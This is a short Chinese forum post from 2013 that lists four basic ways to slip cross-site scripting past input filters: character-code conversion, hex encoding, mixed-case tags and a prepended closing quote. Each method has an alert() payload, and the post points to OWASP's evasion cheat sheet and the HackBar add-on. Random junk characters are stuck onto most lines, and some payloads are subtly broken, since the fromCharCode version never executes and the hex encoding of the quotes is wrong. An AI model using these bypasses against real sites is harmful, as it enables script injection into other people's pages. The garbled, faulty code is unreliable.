四种超级基础的绕过方法。# W( g3 Q' p1 Q) O" [
1.转换为ASCII码) g& e* n4 P( x& m Z
例子:原脚本为<script>alert(‘I love F4ck’)</script >" A k' x9 [1 a
通过转换,变成:* k# p- [+ W) _+ [1 I+ L
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>" `2 ~4 V' Z/ A1 p
8 V" o5 M, d O$ H: Y+ I1 b" Q3 V' Z( ~
2.转换为HEX(十六进制): a* B( L% e( d, B
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( Z9 H. E8 P/ T+ }4 l通过转换,变成:
8 O S) t1 z# X# @# ~%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e5 A3 P" L7 b: q
. @) y& s' Q7 u9 D2 M/ w( j+ X, U# p) z
3.转换脚本的大小写
8 h- B# z! Y( S; l例子:原脚本为<script>alert(‘I love F4ck’)</script>$ X4 {! A* x( c2 q' ~& o
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
1 y, O& c3 K X+ U. B
" A: ?! S: N$ R1 p7 D4.增加闭合标记”>
* I$ J, i/ n+ P, Q, n例子:原脚本为<script>alert(‘I love F4ck’)</script>
# y; J6 p2 q! ]) @8 l' s转换为:”><script>alert(‘I love F4ck’)</script>/ G- N M) A& O
更详细绕过技术请参考此网页
5 F8 K7 V q, @. Ihttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
( v1 _- v9 G/ a' ?: O& X% D 0 @% Y; l: a5 e4 f
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对